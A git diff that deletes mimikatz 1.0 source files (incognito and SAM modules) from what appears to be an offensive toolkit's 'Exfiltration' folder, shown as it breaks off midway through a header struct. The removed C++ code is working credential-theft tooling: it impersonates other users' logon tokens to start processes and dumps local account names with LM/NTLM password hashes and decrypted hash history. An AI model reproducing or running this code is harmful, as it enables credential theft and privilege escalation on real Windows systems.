a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/incognito.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/incognito.cpp deleted file mode 100644 index 7284da7..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/incognito.cpp +++ /dev/null @@ -1,88 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "incognito.h" - -bool searchIncognitoFuncs() -{ - return searchLSAFuncs(); -} - -__kextdll bool __cdecl find_tokens(mod_pipe * monPipe, vector<wstring> * mesArguments) -{ - vector<pair<PFN_ENUM_BY_LUID, wstring>> monProvider; - monProvider.push_back(make_pair<PFN_ENUM_BY_LUID, wstring>(getTokenData, wstring(L"token"))); - return getLogonData(monPipe, mesArguments, &monProvider); -} - -__kextdll bool __cdecl incognito(mod_pipe * monPipe, vector<wstring> * mesArguments) -{ - wostringstream monStream; - if(searchIncognitoFuncs()) - { - if(!mesArguments->empty() && ((mesArguments->size() == 3) || (mesArguments->size() == 4))) - { - wstring idSecAppHigh = L"0", idSecAppLow = mesArguments->front(), session = mesArguments->at(1), maLigne = mesArguments->back(); - if(mesArguments->size() == 4) - { - idSecAppHigh = idSecAppLow; - idSecAppLow = mesArguments->at(1); - session = mesArguments->at(2); - } - LUID monLUID = mod_text::wstringsToLUID(idSecAppHigh, idSecAppLow); - DWORD maSession = _wtoi(session.c_str()); - HANDLE monToken; - monStream << L" * OpenTokenByLogonId({" << monLUID.LowPart << L";" << monLUID.HighPart << L"}) : "; - NTSTATUS status = SeckPkgFunctionTable->OpenTokenByLogonId(&monLUID, &monToken); - if(NT_SUCCESS(status)) - { - monStream << L"OK !" << endl << - L" * SetTokenInformation(TokenSessionId@" << maSession << L") : "; - if(SetTokenInformation(monToken, TokenSessionId, &maSession, sizeof(DWORD)) != 0) - { - monStream << L"OK !" << endl << - L" * CreateProcessAsUser(Token@{" << monLUID.LowPart << L";" << monLUID.HighPart << L"}, TokenSessionId@" << maSession << L", \"" << maLigne << L"\") : "; - PROCESS_INFORMATION mesInfosProcess; - if(mod_process::start(&maLigne, &mesInfosProcess, false, false, monToken)) - { - monStream << L"OK - pid = " << mesInfosProcess.dwProcessId << endl; - CloseHandle(mesInfosProcess.hThread); - CloseHandle(mesInfosProcess.hProcess); - } - else monStream << L"KO - " << mod_system::getWinError() << endl; - CloseHandle(monToken); - } - else monStream << L"KO - " << mod_system::getWinError() << endl; - } - else monStream << L"KO - " << mod_system::getWinError(false, status) << endl; - } - else monStream << L"Format d\'appel invalide : incognito [idSecAppHigh] idSecAppLow sessionDst ligneDeCommande" << endl; - } - return sendTo(monPipe, monStream.str()); -} - -bool WINAPI getTokenData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity) -{ - wostringstream monStream; - if(searchIncognitoFuncs()) - { - HANDLE monToken; - NTSTATUS status = SeckPkgFunctionTable->OpenTokenByLogonId(logId, &monToken); - if(NT_SUCCESS(status)) - { - monStream << L"Disponible !"; - DWORD maSession, tailleRetournee; - if(GetTokenInformation(monToken, TokenSessionId, &maSession, sizeof(DWORD), &tailleRetournee) != 0) - { - monStream << L" - session d\'origine " << maSession; - CloseHandle(monToken); - } - else monStream << L"Indisponible - SetTokenInformation KO : " << mod_system::getWinError() << endl; - } - else monStream << L"OpenTokenByLogonId KO : " << mod_system::getWinError(false, status) << endl; - } - return sendTo(monPipe, monStream.str()); -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/incognito.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/incognito.h deleted file mode 100644 index a8eae58..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/incognito.h +++ /dev/null @@ -1,13 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "../sekurlsa.h" - -bool searchIncognitoFuncs(); -__kextdll bool __cdecl find_tokens(mod_pipe * monPipe, vector<wstring> * mesArguments); -__kextdll bool __cdecl incognito(mod_pipe * monPipe, vector<wstring> * mesArguments); -bool WINAPI getTokenData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity);
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.cpp deleted file mode 100644 index 5555b58..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.cpp +++ /dev/null @@ -1,479 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "sam.h" - -PSAM_I_CONNECT SamIConnect = reinterpret_cast<PSAM_I_CONNECT>(NULL); -PSAM_R_OPEN_DOMAIN SamrOpenDomain = reinterpret_cast<PSAM_R_OPEN_DOMAIN>(NULL); -PSAM_R_OPEN_USER SamrOpenUser = reinterpret_cast<PSAM_R_OPEN_USER>(NULL); -PSAM_R_ENUMERATE_USERS_IN_DOMAIN SamrEnumerateUsersInDomain = reinterpret_cast<PSAM_R_ENUMERATE_USERS_IN_DOMAIN>(NULL); -PSAM_R_QUERY_INFORMATION_USER SamrQueryInformationUser = reinterpret_cast<PSAM_R_QUERY_INFORMATION_USER>(NULL); -PSAM_I_FREE_SAMPR_USER_INFO_BUFFER SamIFree_SAMPR_USER_INFO_BUFFER = reinterpret_cast<PSAM_I_FREE_SAMPR_USER_INFO_BUFFER>(NULL); -PSAM_I_FREE_SAMPR_ENUMERATION_BUFFER SamIFree_SAMPR_ENUMERATION_BUFFER = reinterpret_cast<PSAM_I_FREE_SAMPR_ENUMERATION_BUFFER>(NULL); -PSAM_R_CLOSE_HANDLE SamrCloseHandle = reinterpret_cast<PSAM_R_CLOSE_HANDLE>(NULL); -PSAM_I_GET_PRIVATE_DATA SamIGetPrivateData = reinterpret_cast<PSAM_I_GET_PRIVATE_DATA>(NULL); -PSYSTEM_FUNCTION_025 SystemFunction025 = reinterpret_cast<PSYSTEM_FUNCTION_025>(NULL); -PSYSTEM_FUNCTION_027 SystemFunction027 = reinterpret_cast<PSYSTEM_FUNCTION_027>(NULL); - -bool searchSAMFuncs() -{ - if(!(SamIConnect && - SamrOpenDomain && - SamrOpenUser && - SamrEnumerateUsersInDomain && - SamrQueryInformationUser && - SamIFree_SAMPR_USER_INFO_BUFFER && - SamIFree_SAMPR_ENUMERATION_BUFFER && - SamrCloseHandle && - SamIGetPrivateData && - SystemFunction025 && - SystemFunction027)) - { - HMODULE hSamsrv = GetModuleHandle(L"samsrv"); - HMODULE hAdvapi32 = GetModuleHandle(L"advapi32"); - - if(hSamsrv && hAdvapi32) - { - SamIConnect = reinterpret_cast<PSAM_I_CONNECT>(GetProcAddress(hSamsrv, "SamIConnect")); - SamrOpenDomain = reinterpret_cast<PSAM_R_OPEN_DOMAIN>(GetProcAddress(hSamsrv, "SamrOpenDomain")); - SamrOpenUser = reinterpret_cast<PSAM_R_OPEN_USER>(GetProcAddress(hSamsrv, "SamrOpenUser")); - SamrEnumerateUsersInDomain = reinterpret_cast<PSAM_R_ENUMERATE_USERS_IN_DOMAIN>(GetProcAddress(hSamsrv, "SamrEnumerateUsersInDomain")); - SamrQueryInformationUser = reinterpret_cast<PSAM_R_QUERY_INFORMATION_USER>(GetProcAddress(hSamsrv, "SamrQueryInformationUser")); - SamIFree_SAMPR_USER_INFO_BUFFER = reinterpret_cast<PSAM_I_FREE_SAMPR_USER_INFO_BUFFER>(GetProcAddress(hSamsrv, "SamIFree_SAMPR_USER_INFO_BUFFER")); - SamIFree_SAMPR_ENUMERATION_BUFFER = reinterpret_cast<PSAM_I_FREE_SAMPR_ENUMERATION_BUFFER>(GetProcAddress(hSamsrv, "SamIFree_SAMPR_ENUMERATION_BUFFER")); - SamrCloseHandle = reinterpret_cast<PSAM_R_CLOSE_HANDLE>(GetProcAddress(hSamsrv, "SamrCloseHandle")); - SamIGetPrivateData = reinterpret_cast<PSAM_I_GET_PRIVATE_DATA>(GetProcAddress(hSamsrv, "SamIGetPrivateData")); - SystemFunction025 = reinterpret_cast<PSYSTEM_FUNCTION_025>(GetProcAddress(hAdvapi32, "SystemFunction025")); - SystemFunction027 = reinterpret_cast<PSYSTEM_FUNCTION_027>(GetProcAddress(hAdvapi32, "SystemFunction027")); - } - return (SamIConnect && - SamrOpenDomain && - SamrOpenUser && - SamrEnumerateUsersInDomain && - SamrQueryInformationUser && - SamIFree_SAMPR_USER_INFO_BUFFER && - SamIFree_SAMPR_ENUMERATION_BUFFER && - SamrCloseHandle); - } - else return true; -} - -__kextdll bool __cdecl getSAMFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments) -{ - wostringstream monStream; - monStream << L"** samsrv.dll/advapi32.dll ** ; Statut recherche : " << (searchSAMFuncs() ? L"OK :)" : L"KO :(") << endl << endl << - L"@SamIConnect = " << SamIConnect << endl << - L"@SamrOpenDomain = " << SamrOpenDomain << endl << - L"@SamrOpenUser = " << SamrOpenUser << endl << - L"@SamrEnumerateUsersInDomain = " << SamrEnumerateUsersInDomain << endl << - L"@SamrQueryInformationUser = " << SamrQueryInformationUser << endl << - L"@SamIFree_SAMPR_USER_INFO_BUFFER = " << SamIFree_SAMPR_USER_INFO_BUFFER << endl << - L"@SamIFree_SAMPR_ENUMERATION_BUFFER = " << SamIFree_SAMPR_ENUMERATION_BUFFER << endl << - L"@SamrCloseHandle = " << SamrCloseHandle << endl << - L"@SamIGetPrivateData = " << SamIGetPrivateData << endl << - L"@SystemFunction025 = " << SystemFunction025 << endl << - L"@SystemFunction027 = " << SystemFunction027 << endl; - return sendTo(monPipe, monStream.str()); -} - -__kextdll bool __cdecl getLocalAccounts(mod_pipe * monPipe, vector<wstring> * mesArguments) -{ - if(searchSAMFuncs()) - { - bool sendOk = true, history = true, isCSV = false; - USER_INFORMATION_CLASS monType = UserInternal1Information; - - if(!mesArguments->empty()) - { - isCSV = ((_wcsicmp(mesArguments->front().c_str(), L"/csv") == 0) || _wcsicmp(mesArguments->back().c_str(), L"/csv") == 0); - monType = (((_wcsicmp(mesArguments->front().c_str(), L"/full") == 0) || _wcsicmp(mesArguments->back().c_str(), L"/full") == 0) ? UserAllInformation : UserInternal1Information); - } - - LSA_HANDLE handlePolicy = NULL; - HSAM handleSam = NULL; - HDOMAIN handleDomain = NULL; - HUSER handleUser = NULL; - - LSA_OBJECT_ATTRIBUTES objectAttributes; - memset(&objectAttributes, NULL, sizeof(objectAttributes)); - PPOLICY_ACCOUNT_DOMAIN_INFO ptrPolicyDomainInfo; - - NTSTATUS retourEnum = 0; - PSAMPR_ENUMERATION_BUFFER ptrStructEnumUser = NULL; - DWORD EnumerationContext = 0; - DWORD EnumerationSize = 0; - - PSAMPR_USER_INFO_BUFFER ptrMesInfosUsers = NULL; - - if(NT_SUCCESS(LsaOpenPolicy(NULL, &objectAttributes, POLICY_ALL_ACCESS, &handlePolicy))) - { - if(NT_SUCCESS(LsaQueryInformationPolicy(handlePolicy, PolicyAccountDomainInformation, reinterpret_cast<PVOID *>(&ptrPolicyDomainInfo)))) - { - if(NT_SUCCESS(SamIConnect(NULL, &handleSam, 1, SAM_SERVER_CONNECT))) - { - if(NT_SUCCESS(SamrOpenDomain(handleSam, DOMAIN_ALL_ACCESS, ptrPolicyDomainInfo->DomainSid, &handleDomain))) - { - wstring domainName = mod_text::stringOfSTRING(ptrPolicyDomainInfo->DomainName); - do - { - retourEnum = SamrEnumerateUsersInDomain(handleDomain, &EnumerationContext, NULL, &ptrStructEnumUser, 1000, &EnumerationSize); - if(NT_SUCCESS(retourEnum) || retourEnum == STATUS_MORE_ENTRIES) - { - for(DWORD numUser = 0; numUser < ptrStructEnumUser->EntriesRead && sendOk; numUser++) - { - wstring monUserName = mod_text::stringOfSTRING(ptrStructEnumUser->Buffer[numUser].Name); - ptrMesInfosUsers = NULL; - - if(NT_SUCCESS(SamrOpenUser(handleDomain, USER_ALL_ACCESS, ptrStructEnumUser->Buffer[numUser].RelativeId, &handleUser))) - { - if(NT_SUCCESS(SamrQueryInformationUser(handleUser, monType, &ptrMesInfosUsers))) - { - WUserAllInformation mesInfos = UserInformationsToStruct(monType, ptrMesInfosUsers); - mesInfos.UserId = ptrStructEnumUser->Buffer[numUser].RelativeId; - mesInfos.DomaineName = mod_text::stringOfSTRING(ptrPolicyDomainInfo->DomainName); - - if(mesInfos.UserName.empty()) - mesInfos.UserName = mod_text::stringOfSTRING(ptrStructEnumUser->Buffer[numUser].Name); - - sendOk = descrToPipeInformations(monPipe, monType, mesInfos, isCSV); - SamIFree_SAMPR_USER_INFO_BUFFER(ptrMesInfosUsers, monType); - } - - if(history && SamIGetPrivateData != NULL) - { - sendOk = descrUserHistoryToPipe(monPipe, ptrStructEnumUser->Buffer[numUser].RelativeId, monUserName, domainName, handleUser, monType, isCSV); - } - SamrCloseHandle(reinterpret_cast<PHANDLE>(&handleUser)); - } - else sendOk = sendTo(monPipe, L"Impossible d\'ouvrir l\'objet utilisateur\n"); - } - SamIFree_SAMPR_ENUMERATION_BUFFER(ptrStructEnumUser); - } - else sendOk = sendTo(monPipe, L"Echec dans l\'obtention de la liste des objets\n"); - - } while(retourEnum == STATUS_MORE_ENTRIES && sendOk); - SamrCloseHandle(reinterpret_cast<PHANDLE>(&handleDomain)); - } - else sendOk = sendTo(monPipe, L"Impossible d\'obtenir les information sur le domaine\n"); - SamrCloseHandle(reinterpret_cast<PHANDLE>(&handleSam)); - } - else sendOk = sendTo(monPipe, L"Impossible de se connecter à la base de sécurité du domaine\n"); - LsaFreeMemory(ptrPolicyDomainInfo); - } - else sendOk = sendTo(monPipe, L"Impossible d\'obtenir des informations sur la politique de sécurité\n"); - LsaClose(handlePolicy); - } - else sendOk = sendTo(monPipe, L"Impossible d\'ouvrir la politique de sécurité\n"); - - return sendOk; - } - else return getSAMFunctions(monPipe, mesArguments); -} - -bool descrToPipeInformations(mod_pipe * monPipe, USER_INFORMATION_CLASS type, WUserAllInformation & mesInfos, bool isCSV) -{ - wstringstream maReponse; - - switch(type) - { - case UserInternal1Information: - if(isCSV) - { - maReponse << - mesInfos.UserId << L";" << - mesInfos.UserName << L";" << - mesInfos.DomaineName << L";" << - mesInfos.LmOwfPassword << L";" << - mesInfos.NtOwfPassword << L";" - ; - } - else - { - maReponse << - L"ID : " << mesInfos.UserId << endl << - L"Nom : " << mesInfos.UserName << endl << - L"Domaine : " << mesInfos.DomaineName << endl << - L"Hash LM : " << mesInfos.LmOwfPassword << endl << - L"Hash NTLM : " << mesInfos.NtOwfPassword << endl - ; - } - break; - case UserAllInformation: - if(isCSV) - { - maReponse << - mesInfos.UserId << L';' << - mesInfos.UserName << L';' << - mesInfos.DomaineName << L';' << - protectMe(mesInfos.FullName) << L';' << - mesInfos.isActif << L';' << - mesInfos.isLocked << L';' << - mesInfos.TypeCompte << L';' << - protectMe(mesInfos.UserComment) << L';' << - protectMe(mesInfos.AdminComment) << L';' << - mesInfos.AccountExpires_strict << L';' << - protectMe(mesInfos.WorkStations) << L';' << - protectMe(mesInfos.HomeDirectory) << L';' << - protectMe(mesInfos.HomeDirectoryDrive) << L';' << - protectMe(mesInfos.ProfilePath) << L';' << - protectMe(mesInfos.ScriptPath) << L';' << - mesInfos.LogonCount << L';' << - mesInfos.BadPasswordCount << L';' << - mesInfos.LastLogon_strict << L';' << - mesInfos.LastLogoff_strict << L';' << - mesInfos.PasswordLastSet_strict << L';' << - mesInfos.isPasswordNotExpire << L';' << - mesInfos.isPasswordNotRequired << L';' << - mesInfos.isPasswordExpired << L';' << - mesInfos.PasswordCanChange_strict << L';' << - mesInfos.PasswordMustChange_strict << L';' << - mesInfos.LmOwfPassword << L';' << - mesInfos.NtOwfPassword << L';' - ; - } - else - { - maReponse << boolalpha << - L"Compte" << endl << - L"======" << endl << - L"ID : " << mesInfos.UserId << endl << - L"Nom : " << mesInfos.UserName << endl << - L"Domaine : " << mesInfos.DomaineName << endl << - L"Nom complet : " << mesInfos.FullName << endl << - L"Actif : " << mesInfos.isActif << endl << - L"Verouillé : " << mesInfos.isLocked << endl << - L"Type : " << mesInfos.TypeCompte << endl << - L"Commentaire utilisateur : " << mesInfos.UserComment << endl << - L"Commentaire admin : " << mesInfos.AdminComment << endl << - L"Expiration : " << mesInfos.AccountExpires << endl << - L"Station(s) : " << mesInfos.WorkStations << endl << - endl << - L"Chemins" << endl << - L"-------" << endl << - L"Répertoire de base : " << mesInfos.HomeDirectory << endl << - L"Lecteur de base : " << mesInfos.HomeDirectoryDrive << endl << - L"Profil : " << mesInfos.ProfilePath << endl << - L"Script de démarrage : " << mesInfos.ScriptPath << endl << - endl << - L"Connexions" << endl << - L"----------" << endl << - L"Nombre : " << mesInfos.LogonCount << endl << - L"Echecs : " << mesInfos.BadPasswordCount << endl << - L"Dernière connexion : " << mesInfos.LastLogon << endl << - L"Dernière déconnexion : " << mesInfos.LastLogoff << endl << - endl << - L"Mot de passe" << endl << - L"------------" << endl << - L"Dernier changement : " << mesInfos.PasswordLastSet << endl << - L"N\'expire pas : " << mesInfos.isPasswordNotExpire << endl << - L"Peut être vide : " << mesInfos.isPasswordNotRequired << endl << - L"Mot de passe expiré : " << mesInfos.isPasswordExpired << endl << - L"Possibilité changement : " << mesInfos.PasswordCanChange << endl << - L"Obligation changement : " << mesInfos.PasswordMustChange << endl << - endl << - L"Hashs" << endl << - L"-----" << endl << - L"Hash LM : " << mesInfos.LmOwfPassword << endl << - L"Hash NTLM : " << mesInfos.NtOwfPassword << endl << - endl - ; - } - break; - } - - maReponse << endl; - return sendTo(monPipe, maReponse.str()); -} - -WUserAllInformation UserInformationsToStruct(USER_INFORMATION_CLASS type, PSAMPR_USER_INFO_BUFFER & monPtr) -{ - WUserAllInformation mesInfos; - PSAMPR_USER_INTERNAL1_INFORMATION ptrPassword = NULL; - PSAMPR_USER_ALL_INFORMATION ptrAllInformations = NULL; - - switch(type) - { - case UserInternal1Information: - ptrPassword = reinterpret_cast<PSAMPR_USER_INTERNAL1_INFORMATION>(monPtr); - - mesInfos.LmPasswordPresent = ptrPassword->LmPasswordPresent != 0; - mesInfos.NtPasswordPresent = ptrPassword->NtPasswordPresent != 0; - - if(mesInfos.LmPasswordPresent) - mesInfos.LmOwfPassword = mod_text::stringOfHex(ptrPassword->EncryptedLmOwfPassword.data, sizeof(ptrPassword->EncryptedLmOwfPassword.data)); - if(mesInfos.NtPasswordPresent) - mesInfos.LmOwfPassword = mod_text::stringOfHex(ptrPassword->EncryptedNtOwfPassword.data, sizeof(ptrPassword->EncryptedNtOwfPassword.data)); - break; - - case UserAllInformation: - ptrAllInformations = reinterpret_cast<PSAMPR_USER_ALL_INFORMATION>(monPtr); - - mesInfos.UserId = ptrAllInformations->UserId; - mesInfos.UserName = mod_text::stringOfSTRING(ptrAllInformations->UserName); - mesInfos.FullName = mod_text::stringOfSTRING(ptrAllInformations->FullName); correctMe(mesInfos.FullName); - - mesInfos.isActif = (ptrAllInformations->UserAccountControl & USER_ACCOUNT_DISABLED) == 0; - mesInfos.isLocked = (ptrAllInformations->UserAccountControl & USER_ACCOUNT_AUTO_LOCKED) != 0; - - if(ptrAllInformations->UserAccountControl & USER_SERVER_TRUST_ACCOUNT) - mesInfos.TypeCompte.assign(L"Contrôleur de domaine"); - else if(ptrAllInformations->UserAccountControl & USER_WORKSTATION_TRUST_ACCOUNT) - mesInfos.TypeCompte.assign(L"Ordinateur"); - else if(ptrAllInformations->UserAccountControl & USER_NORMAL_ACCOUNT) - mesInfos.TypeCompte.assign(L"Utilisateur"); - else - mesInfos.TypeCompte.assign(L"Inconnu"); - - mesInfos.UserComment = mod_text::stringOfSTRING(ptrAllInformations->UserComment); correctMe(mesInfos.AdminComment); - mesInfos.AdminComment = mod_text::stringOfSTRING(ptrAllInformations->AdminComment); correctMe(mesInfos.AdminComment); - mesInfos.AccountExpires = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->AccountExpires); - mesInfos.AccountExpires_strict = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->AccountExpires, true); - mesInfos.WorkStations = mod_text::stringOfSTRING(ptrAllInformations->WorkStations); - mesInfos.HomeDirectory = mod_text::stringOfSTRING(ptrAllInformations->HomeDirectory); correctMe(mesInfos.HomeDirectory); - mesInfos.HomeDirectoryDrive = mod_text::stringOfSTRING(ptrAllInformations->HomeDirectoryDrive); correctMe(mesInfos.HomeDirectoryDrive); - mesInfos.ProfilePath = mod_text::stringOfSTRING(ptrAllInformations->ProfilePath); correctMe(mesInfos.ProfilePath); - mesInfos.ScriptPath = mod_text::stringOfSTRING(ptrAllInformations->ScriptPath); correctMe(mesInfos.ScriptPath); - mesInfos.LogonCount = ptrAllInformations->LogonCount; - mesInfos.BadPasswordCount = ptrAllInformations->BadPasswordCount; - mesInfos.LastLogon = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->LastLogon); - mesInfos.LastLogon_strict = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->LastLogon, true); - mesInfos.LastLogoff = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->LastLogoff); - mesInfos.LastLogoff_strict = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->LastLogoff, true); - mesInfos.PasswordLastSet = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->PasswordLastSet); - mesInfos.PasswordLastSet_strict = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->PasswordLastSet, true); - mesInfos.isPasswordNotExpire = (ptrAllInformations->UserAccountControl & USER_DONT_EXPIRE_PASSWORD) != 0; - mesInfos.isPasswordNotRequired = (ptrAllInformations->UserAccountControl & USER_PASSWORD_NOT_REQUIRED) != 0; - mesInfos.isPasswordExpired = ptrAllInformations->PasswordExpired != 0; - mesInfos.PasswordCanChange = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->PasswordCanChange); - mesInfos.PasswordCanChange_strict = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->PasswordCanChange, true); - mesInfos.PasswordMustChange = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->PasswordMustChange); - mesInfos.PasswordMustChange_strict = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->PasswordMustChange, true); - mesInfos.LmPasswordPresent = ptrAllInformations->LmPasswordPresent != 0; - mesInfos.NtPasswordPresent = ptrAllInformations->NtPasswordPresent != 0; - - if(mesInfos.LmPasswordPresent) - mesInfos.LmOwfPassword = mod_text::stringOfHex(reinterpret_cast<BYTE *>(ptrAllInformations->LmOwfPassword.Buffer), ptrAllInformations->LmOwfPassword.Length); - if(mesInfos.NtPasswordPresent) - mesInfos.LmOwfPassword = mod_text::stringOfHex(reinterpret_cast<BYTE *>(ptrAllInformations->NtOwfPassword.Buffer), ptrAllInformations->NtOwfPassword.Length); - - break; - } - return mesInfos; -} - -bool descrUserHistoryToPipe(mod_pipe * monPipe, DWORD rid, wstring monUserName, wstring domainName, HUSER handleUser, USER_INFORMATION_CLASS type, bool isCSV) -{ - WUserAllInformation mesInfos; - mesInfos.DomaineName = domainName; - mesInfos.UserId = rid; - - DWORD Context = 2, Type = 0, tailleBlob; - PWHashHistory pMesDatas = NULL; - bool sendOk = true; - - if(NT_SUCCESS(SamIGetPrivateData(handleUser, &Context, &Type, &tailleBlob, &pMesDatas))) - { - unsigned short nbEntrees = min(pMesDatas->histNTLMsize, pMesDatas->histLMsize) / 16; - - for(unsigned short i = 1; i < nbEntrees && sendOk; i++) - { - BYTE monBuff[16] = {0}; - - wostringstream userNameQualif; - userNameQualif << monUserName << L"{p-" << i << L"}"; - mesInfos.UserName = userNameQualif.str(); - - if(NT_SUCCESS(SystemFunction025(pMesDatas->hashs[nbEntrees + i], &rid, monBuff))) - { - mesInfos.LmPasswordPresent = 1; - mesInfos.LmOwfPassword = mod_text::stringOfHex(monBuff, 0x10); - } - else - { - mesInfos.LmPasswordPresent = 0; - mesInfos.LmOwfPassword = L"échec de décodage :("; - } - - if(NT_SUCCESS(SystemFunction027(pMesDatas->hashs[i], &rid, monBuff))) - { - mesInfos.NtPasswordPresent = 1; - mesInfos.NtOwfPassword = mod_text::stringOfHex(monBuff, 0x10); - } - else - { - mesInfos.NtPasswordPresent = 0; - mesInfos.NtOwfPassword = L"échec de décodage :("; - } - - sendOk = descrToPipeInformations(monPipe, type, mesInfos, isCSV); - } - LocalFree(pMesDatas); - } - return sendOk; -} - -wstring toTimeFromOLD_LARGE_INTEGER(OLD_LARGE_INTEGER & monInt, bool isStrict) -{ - wostringstream reponse; - - if(monInt.LowPart == ULONG_MAX && monInt.HighPart == LONG_MAX) - { - if(!isStrict) - reponse << L"N\'arrive jamais"; - } - else if(monInt.LowPart == 0 && monInt.HighPart == 0) - { - if(!isStrict) - reponse << L"N\'est pas encore arrivé"; - } - else - { - SYSTEMTIME monTimeStamp; - if(FileTimeToSystemTime(reinterpret_cast<PFILETIME>(&monInt), &monTimeStamp) != FALSE) - { - reponse << dec << - setw(2)<< setfill(wchar_t('0')) << monTimeStamp.wDay << L"/" << - setw(2)<< setfill(wchar_t('0')) << monTimeStamp.wMonth << L"/" << - setw(4)<< setfill(wchar_t('0')) << monTimeStamp.wYear << L" " << - setw(2)<< setfill(wchar_t('0')) << monTimeStamp.wHour << L":" << - setw(2)<< setfill(wchar_t('0')) << monTimeStamp.wMinute << L":" << - setw(2)<< setfill(wchar_t('0')) << monTimeStamp.wSecond; - } - } - return reponse.str(); -} - -wstring protectMe(wstring &maChaine) -{ - wstring result; - if(!maChaine.empty()) - { - result = L"\""; - result.append(maChaine); - result.append(L"\""); - } - return result; -} - -void correctMe(wstring &maChaine) -{ - unsigned char source[] = {0x19, 0x20, 0x13, 0x20, 0xab, 0x00, 0xbb, 0x00, 0x26, 0x20}; - unsigned char replac[] = {'\'', 0 , '-' , 0 , '\"', 0 , '\"', 0, '.', 0 }; - - for(unsigned int i = 0; i < maChaine.size() ; i++) - { - const BYTE * monPtr = reinterpret_cast<const BYTE *>(&maChaine.c_str()[i]); - for(int j = 0 ; j < min(sizeof(source), sizeof(replac)) ; j+=2) - { - if(*monPtr == source[j] && *(monPtr + 1) == source[j+1]) - { - *const_cast<BYTE *>(monPtr) = replac[j]; - *const_cast<BYTE *>(monPtr + 1) = replac[j + 1]; - break; - } - } - } -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.h deleted file mode 100644 index 870aa4d..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.h +++ /dev/null @@ -1,210 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "kmodel.h" -#include "mod_text.h" -#include <sstream> -#include <iomanip> - -bool searchSAMFuncs(); -__kextdll bool __cdecl getSAMFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments); -__kextdll bool __cdecl getLocalAccounts(mod_pipe * monPipe, vector<wstring> * mesArguments); - -#define SAM_SERVER_CONNECT 0x00000001 -#define DOMAIN_ALL_ACCESS 0x000F07FF -#define USER_ALL_ACCESS 0x000F07FF - -#define USER_ACCOUNT_DISABLED 0x00000001 -#define USER_PASSWORD_NOT_REQUIRED 0x00000004 -#define USER_NORMAL_ACCOUNT 0x00000010 -#define USER_WORKSTATION_TRUST_ACCOUNT 0x00000080 -#define USER_SERVER_TRUST_ACCOUNT 0x00000100 -#define USER_DONT_EXPIRE_PASSWORD 0x00000200 -#define USER_ACCOUNT_AUTO_LOCKED 0x00000400 -#define USER_SMARTCARD_REQUIRED 0x00001000 -#define USER_TRUSTED_FOR_DELEGATION 0x00002000 -#define USER_PASSWORD_EXPIRED 0x00020000 - -typedef struct _WUserAllInformation -{ - unsigned long UserId; - wstring UserName; - wstring DomaineName; - wstring FullName; - bool isActif; - bool isLocked; - wstring TypeCompte; - wstring UserComment; - wstring AdminComment; - wstring AccountExpires; - wstring AccountExpires_strict; - wstring WorkStations; - - wstring HomeDirectory; - wstring HomeDirectoryDrive; - wstring ProfilePath; - wstring ScriptPath; - - unsigned short LogonCount; - unsigned short BadPasswordCount; - wstring LastLogon; - wstring LastLogon_strict; - wstring LastLogoff; - wstring LastLogoff_strict; - - wstring PasswordLastSet; - wstring PasswordLastSet_strict; - bool isPasswordNotExpire; - bool isPasswordNotRequired; - bool isPasswordExpired; - wstring PasswordCanChange; - wstring PasswordCanChange_strict; - wstring PasswordMustChange; - wstring PasswordMustChange_strict; - - bool LmPasswordPresent; - wstring LmOwfPassword; - bool NtPasswordPresent; - wstring NtOwfPassword; -} WUserAllInformation, *PUserAllInformation; - -typedef struct _WHashHistory -{ - DWORD unkVersion; - unsigned short currentLMsize; - unsigned short unkCurrentLMsize; - DWORD unkCurLM; - BYTE EncLMhash[16]; - - unsigned short currentNTLMsize; - unsigned short unkCurrentNTLMsize; - DWORD unkCurNTLM; - BYTE EncNTLMhash[16]; - - unsigned short histLMsize; - unsigned short unkhistLMsize; - DWORD unkHistLM; - - unsigned short histNTLMsize; - unsigned short unkhistNTLMsize; 